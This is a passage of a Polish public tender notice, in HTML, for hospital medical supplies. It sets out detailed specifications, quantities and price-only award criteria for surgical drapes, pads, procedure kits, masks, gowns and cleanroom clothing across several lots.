pojedynczo.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min.: nr lot, datę ważności.<br/>Wyrób medyczny.<br/>Ilość: 7 000 sztuk.<br/>3.	Serweta operacyjna sterylna dwuczęściowa z regulowanym otworem i przylepcem, dwuwarstwowa (pierwsza warstwa – włóknina polipropylenowa, druga warstwa – folia) o gramaturze nie mniejszej niż 50 g/m2 na całej powierzchni serwety, w rozmiarze 85-95 cm x 75-85 cm.<br/>Pakowana pojedynczo.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min.: nr lot, datę ważności.<br/>Wyrób medyczny.<br/>Ilość: 16 000 sztuk.<br/>4.	Serweta operacyjna sterylna dwuczęściowa z regulowanym otworem i przylepcem, dwuwarstwowa (pierwsza warstwa – włóknina polipropylenowa, druga warstwa – folia) o gramaturze nie mniejszej niż 50 g/m2 na całej powierzchni serwety, w rozmiarze 240-260 cm x 145-165 cm .<br/>Pakowana pojedynczo.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min.: nr lot, datę ważności.<br/>Wyrób medyczny.<br/>Ilość: 3 000 sztuk.<br/>Wszystkie produkty objęte Pakietem 5 muszą być wyrobami medycznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 6 Obłożenia i podkłady medyczne:<br/>1.	Podkład/serweta ochronna na stół operacyjny, przeciwodleżynowa, 5-cio warstwowa, zintegrowana wielopunktowo na całej powierzchni chłonnej, bez przeszyć, samo wygładzająca się, zapobiegająca przesuwaniu się warstwy zewnętrznej względem rdzenia, wykonana z włókniny polipropylenowej, wysokochłonnej polimerowej warstwy środkowej i spodniej pełnobarierowej teksturowanej folii polietylenowej, zabezpieczającej przed przesuwaniem się i ślizganiem podkładu po powierzchni.<br/>Parametry:<br/>- chłonność min. 35 ml/100 cm2,<br/>- gramatura podstawowa nie mniejsza niż: 295 g/m2,<br/>- wymiary: 95-110 cm x 220-240 cm, rdzeń chłonny o wymiarach co najmniej 45 cm x 200 cm.<br/>Wyrób medyczny.<br/>Ilość: 2 500 sztuk.<br/>2.	Podkład/serweta ochronna, przeciwodleżynowa, 5-cio warstwowa, zintegrowana wielopunktowo co zapobiega tworzeniu się zagięć pod pacjentem, wykonana z włókniny polipropylenowej, wysokochłonnej polimerowej warstwy środkowej i spodniej pełnobarierowej teksturowanej folii polietylenowej, zabezpieczającej przed przesuwaniem się i ślizganiem podkładu po powierzchni. <br/>Parametry:<br/>- chłonność min. 35ml/100 cm2;<br/>- gramatura podstawowa nie mniejsza niż 295 g/m2;<br/>- wymiary: 95-110 cm x 145-155 cm, rdzeń chłonny o wymiarach co najmniej 45 cm x 130 cm, serweta zakończona marginesami z nieprzeziernego laminatu ze wszystkich stron podkładu.<br/>Wyrób medyczny.<br/>Ilość: 1 500 sztuk.<br/>3.	Jednorazowa mata na podłogę o dużej chłonności płynów (minimum 3 l/m²) rozmiar 70 cm x 140 cm (+/- 5 cm). Budowa maty wielowarstwowa, wierzchnia warstwa hydrofilowa o trwałej niestrzępiącej się konstrukcji, wewnętrzna warstwa celulozowo poliestrowa o wysokiej chłonności, foliowy spód nieprzemakalny, antypoślizgowy zapobiegający ślizganiu się produktu po mokrej podłodze. Pakowana pojedynczo.<br/>Ilość: 50 sztuk.<br/>4.	Dwustronna mata podłogowa o dużej chłonności płynów (minimum 20 l/m²), rozmiar 75 cm x 35 cm (+/- 5 cm), w tym część chłonna 70 cm x 30 cm (+/- 2 cm), marginesy ułatwiające usunięcie maty po zaabsorbowaniu płynów. Budowa maty wielowarstwowa z warstwą żelującą.<br/>Produkt jednorazowego użytku, niesterylny. <br/>Ilość: 50 sztuk.<br/>5.	Komplet pościeli jednorazowej, z włókniny o gram. min. 30 g/m2, niejałowy, zawierający co najmniej:<br/>	poszewka 70-80 cm x 70-90 cm,<br/>	poszwa 190-210 cm x 140-160 cm,<br/>	prześcieradło 210-220 cm x 150-160 cm.<br/>Komplety pakowane pojedynczo. <br/>Ilość: 200 kompletów.<br/>Produkty objęte Pakietem 6 poz. 1 i 2 muszą być wyrobami medycznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 7 Obłożenia operacyjne:<br/>1.	Jałowy zestaw (komplet) chirurgiczny uniwersalny w składzie:<br/>1)	Serweta operacyjna 180 x 180 cm (+/- 5 cm), z taśmą samoprzylepną, wzmocniona – 1 szt.<br/>4 warstwowa serweta, z warstwą komfortową od strony pacjenta o gramaturze minimum 12 g/m2, serweta posiada wzmocnienie w strefie krytycznej o rozmiarze 25 x 50 cm (+/- 5 cm) i łącznej gramaturze w obszarze krytycznym powyżej 105 g/m2. Obłożenie posiada wbudowane organizatory przewodów. <br/>2)	Serweta operacyjna 240 x 150 cm (+/- 5 cm) z taśmą samoprzylepną, wzmocniona – 1 szt.<br/>4 warstwowa serweta, z warstwą komfortową od strony pacjenta o gramaturze minimum 12 g/m2, serweta posiada wzmocnienie w strefie krytycznej o rozmiarze 25 x 50 cm (+/- 5 cm) i łącznej gramaturze w obszarze krytycznym powyżej 105 g/m2. Obłożenie posiada wbudowane organizatory przewodów.<br/>3)	Serwety operacyjne 90 x 75 cm (+/- 5 cm), wzmocnione – 2 szt. <br/>4 warstwowa serweta, z warstwą komfortową od strony pacjenta o gramaturze minimum 12 g/m2, serweta posiada wzmocnienie w strefie krytycznej o rozmiarze 25 x 50 cm (+/- 5 cm) i łącznej gramaturze w obszarze krytycznym powyżej 105 g/m2. <br/>4)	Osłona na stolik Mayo 80 x 145 cm (+/- 5 cm) – 1 szt., osłona wykonana z mocnej folii PE o grubości minimum 60 µm i chłonnym wzmocnieniu o rozmiarze 65 x 85 cm (+/- 5 cm) i gramaturze wzmocnienia min. 25 g/m2.<br/>5)	Ręczniki chłonne 20 x 30 cm (+/- 5 cm) – 4 szt.<br/>6)	Taśma lepna – 1 szt., wykonana z folii PE i włókniny poliestrowej, o gramaturze minimum 40 g/m2, którą można dowolnie formować. <br/>7)	Osłona na stół narzędziowy 155 x 190 cm (+/- 5 cm), wzmocnienie włókninowe 80 x 190 cm (+/- 5 cm) – będące również owinięciem zestawu.<br/>Obłożenia muszą cechować się I klasą palności na poziomie >3,5s.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min. nr lot., datę ważności.<br/>Produkt sterylizowany zgodnie z normami wymaganymi prawem.<br/>Wyrób medyczny.<br/>Ilość: 1 100 kompletów.<br/>2.	Jałowy zestaw (komplet) serwet operacyjnych z taśmą lepną typu FLEX. <br/>Skład kompletu:<br/>1)	serweta górna - ekran anestezjologiczny rozm. 175 x 300 cm (+/-5 cm) - 1szt. <br/>2)	serwety boczne rozm. 80 x 90 cm (+/- 5 cm) - 2szt.<br/>3)	serweta dolna rozm. 180 x 180 cm (+/- 5 cm) - 1 szt.<br/>W/w serwety wykończone w centralnej części przeźroczystą taśmą lepną typu Flex, która dokładnie przylega do krzywizn ciała i całkowicie zabezpiecza przed przeciekaniem, rozm. min. 3 x 40 cm, po bokach standardowa taśma lepna. Serwety z dodatkową wstawką wysokochłonną (gramatura min. 50 g/m2) w strefie krytycznej, rozm. wstawki min. 20 x 45 cm. <br/>4)	serweta/osłona na stolik Mayo rozm. 75 x 150 cm (+/- 5 cm) z warstwą chłonną 70 x 85 cm (+/- 5 cm) - 1szt.<br/>5)	ręczniki chłonne jednorazowe rozm. 20 x 30 cm (+/- 5 cm) - 4szt.<br/>6)	dwuwarstwowa taśma lepna rozm. 9 x 49 cm (+/- 1 cm) - 1szt.<br/>7)	serweta owinięcie zestawu 150 x 190 cm (+/- 5 cm) przykrycie na stolik instrumentalny - 1 szt.<br/>Serwety wykonane z laminatu trójwarstwowego o gramaturze min. 75g/m2, a w strefie krytycznej dodatkowa wstawka wysokochłonną o gramaturze min. 50 g/m2. <br/>Wytrzymałość na penetrację płynów minimum 195 cm H2O w strefie krytycznej. <br/>Obłożenia muszą cechować się I klasą palności na poziomie >3,5s.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierające min. nr lot, datę ważności.<br/>Produkt sterylizowany zgodnie z normami wymaganymi prawem. <br/>Wyrób medyczny.<br/>Ilość: 50 kompletów.<br/>3.	Jałowy zestaw (komplet) operacyjny do amputacji kończyny w składzie:<br/>1)	Serweta operacyjna 180 x 180 cm (+/- 5 cm), z taśmą samoprzylepną, wzmocniona – 1 szt.<br/>4 warstwowa serweta, z warstwą komfortową od strony pacjenta o gramaturze minimum 12 g/m2, serweta posiada wzmocnienie w strefie krytycznej o rozmiarze 25 x 50 cm (+/- 5 cm) i łącznej gramaturze w obszarze krytycznym powyżej 105 g/m2. Obłożenie posiada wbudowane organizatory przewodów. <br/>2)	Serweta operacyjna 240 x 150 cm (+/- 5 cm) z taśmą samoprzylepną, wzmocniona – 1 szt.<br/>4 warstwowa serweta, z warstwą komfortową od strony pacjenta o gramaturze minimum 12 g/m2, serweta posiada wzmocnienie w strefie krytycznej o rozmiarze 25 x 55 cm (+/- 5 cm) i łącznej gramaturze w obszarze krytycznym powyżej 105 g/m2. Obłożenie posiada wbudowane organizatory przewodów.<br/>3)	Serwety operacyjne 90 x 75 cm (+/- 5 cm), wzmocnione – 2 szt. <br/>4 warstwowa serweta, z warstwą komfortową od strony pacjenta o gramaturze minimum 12 g/m2, serweta posiada wzmocnienie w strefie krytycznej o rozmiarze 25 x 55 cm (+/- 5 cm) i łącznej gramaturze w obszarze krytycznym powyżej 105 g/m2. <br/>4)	Osłona na stolik Mayo 80 x 145 cm (+/- 5 cm) – 1 szt., osłona wykonana z mocnej folii PE o grubości minimum 60 µm i chłonnym wzmocnieniu o rozmiarze 65 x 85 cm (+/- 5 cm) i gramaturze wzmocnienia min. 25 g/m2.<br/>5)	Ręczniki chłonne 20 x 30 cm (+/- 5 cm) – 4 szt.<br/>6)	Taśma lepna – 1 szt., wykonana z folii PE i włókniny poliestrowej, o gramaturze min. 40 g/m2, którą można dowolnie formować. <br/>7)	Sterylne fartuchy chirurgiczne wzmocnione folią rozmiar L – 1 szt. i XL – 2 szt. <br/>Fartuch chirurgiczny wykonany z włókniny typu spunlace o gramaturze min. 65 g/m2. Na przodzie wzmocnienie wykonane z nieprzepuszczalnej, oddychającej folii polietylenowej o grubości min. 46 µm. Wzmocnienie rękawa wykonane z nieprzepuszczalnego laminatu, składającego się z folii polietylenowej o grubości min. 27,5 µm.<br/>Fartuch z tyłu zapinany na rzep, rękawy wykończone elastycznym mankietem o długości min. 8 cm. Troki przyszyte do fartucha, złączone kartonikiem, umożliwiającym sterylną aplikację zarówno z przodu jak i z tyłu operatora. Odporność na przenikanie cieczy w obszarze krytycznym min. 150 cm H2O. <br/>8)	Miska nerkowata jednorazowa min. 700 ml – 1 szt.<br/>9)	Osłona na stół narzędziowy 155 x 190 cm (+/- 5 cm), wzmocnienie włókninowe 80 x 190 cm (+/- 5 cm) – będące również owinięciem zestawu. <br/>10)	Bandaż elastyczny , szeroki 15 cm, 5 m (+/- 0,5 m) – 1 szt.<br/>11)	Bandaż gazowy biały, szeroki 12 cm, 4 m (+/- 0,5 m) – 1 szt.<br/>12)	Zapinka do bandaża – 1 szt. <br/>13)	Kompres włókninowy 10 x 10 cm, 4 warstwy, znacznik RTG, biały – 50 szt. – spięte po 10 szt.<br/>14)	Kompres gazowy laparotomijny 30 x 50 cm, gaza 17 nitek, 6 warstw, znacznik RTG, biały - 5 szt.<br/>15)	Ostrze chirurgiczne nr 10 z plastikową nasadką i osłonką - 1 szt.<br/>16)	Ostrze chirurgiczne nr 24 z plastikową nasadką i osłonką – 1 szt. <br/>17)	Dren łączący do ssaka PVC, 25CH/16CH, długość min. 1,5 m, końcówki F/F – 1 szt.<br/>18)	Aspiracja typu yankauer 18CH, 28 cm, okrągła końcówka, 6 otworów, regulacja ssania – 1 szt.<br/>19)	Pojemnik na igły piankowo-magnetyczny. <br/>Obłożenia i fartuchy muszą cechować się I klasą palności na poziomie >3,5s.<br/>Opakowanie zabezpieczające przed przypadkowym uszkodzeniem; na opakowaniu etykiety w języku polskim z przynajmniej dwoma naklejkami do wklejenia do dokumentacji medycznej zawierającymi min. nr lot, datę ważności.<br/>Produkt sterylizowany zgodnie z normami wymaganymi prawem. <br/>Wyrób medyczny.<br/>Ilość: 10 kompletów.<br/>Wszystkie produkty objęte pakietem 7 muszą być wyrobami medycznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33199000-1 - Odzież medyczna</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33140000-3 - Materiały medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 8:<br/>Koszula operacyjna dla pacjenta, niejałowa, jednorazowego użytku, wykonana z włókniny nieprzejrzystej o gramaturze min. 25 g/m², krótki rękaw, wiązana w pasie i przy szyi, rozmiar uniwersalny.<br/>Ilość: 400 sztuk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33199000-1 - Odzież medyczna</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 9:<br/>Kołdra jednorazowa kompatybilna z urządzeniem do ogrzewania pacjenta BairHugger.<br/>Rozmiar 200-215 cm x 85-99 cm. Pakowana pojedynczo.<br/>Ilość: 350 sztuk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 10:<br/>Podkład medyczny perforowany w odcinkach nie większych niż 100 cm, na rolce, celuloza dwuwarstwowa, szerokość 50-55 cm. Długość na rolce 45-50 m.<br/>Ilość: 500 rolek. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 11 Odzież medyczna jednorazowa:<br/>1.	Maska chirurgiczna pełnobarierowa, trzywarstwowa o łącznej gramaturze minimum 70 g/m2, z gumką, regulowana nasadka na nos. Co najmniej typ II. Stopień filtracji BFE ≥ 98%. <br/>Wyrób medyczny. <br/>Pakowane po maksimum 50 sztuk.<br/>Ilość: 60 000 sztuk.<br/>2.	Maska chirurgiczna pełnobarierowa, trzywarstwowa z trokami o łącznej gramaturze minimum 70 g/m2.<br/>Co najmniej typ II. Stopień filtracji BFE ≥ 98%. <br/>Wyrób medyczny.<br/>Pakowane po maksimum 50 sztuk.<br/>Ilość: 1 500 sztuk.<br/>Wszystkie produkty objęte Pakietem 11 muszą być wyrobami medycznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33199000-1 - Odzież medyczna</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33140000-3 - Materiały medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 12:<br/>Koc jednorazowego użytku, niejałowy, wykonany z lekkiej włókniny o gramaturze min. 20 g/m2, z wypełnieniem poliestrowym lub poliestrowo-wiskozowym o gramaturze min. 55 g/m2; na całej powierzchni przeszycia zapobiegające przemieszczaniu się elementów poszczególnych warstw; wymiary 200-220 cm x 110-140 cm.<br/>Ilość: 100 sztuk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 13</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 13:<br/>Antystatyczna odzież pod kombinezon wykonana z oddychającej włókniny, posiadająca wytrzymałość na rozciąganie, zapewniająca ochronę przed pyłami i cząstkami stałymi, bluza z długim rękawem zakończonym elastycznym mankietem, bluza wkładana przez głowę, długie spodnie ze ściągaczem lub gumką w pasie, niepyląca z możliwością sterylizacji radiacyjnej bądź parowej. <br/>Odzież przeznaczona do pracy w pomieszczeniach czystych spełniających klasę czystości C.<br/>Dostępne rozmiary: M, XL.<br/>Ilość: 800 kompletów. <br/>Wykonawca jest zobowiązany dostarczyć instrukcję sterylizacji radiacyjnej bądź parowej odzieży z określeniem warunków sterylizacji.<br/>Szczegółowy opis przedmiotu zamówienia zawarto w Rozdziale 5 pkt 5.3 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33199000-1 - Odzież medyczna</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 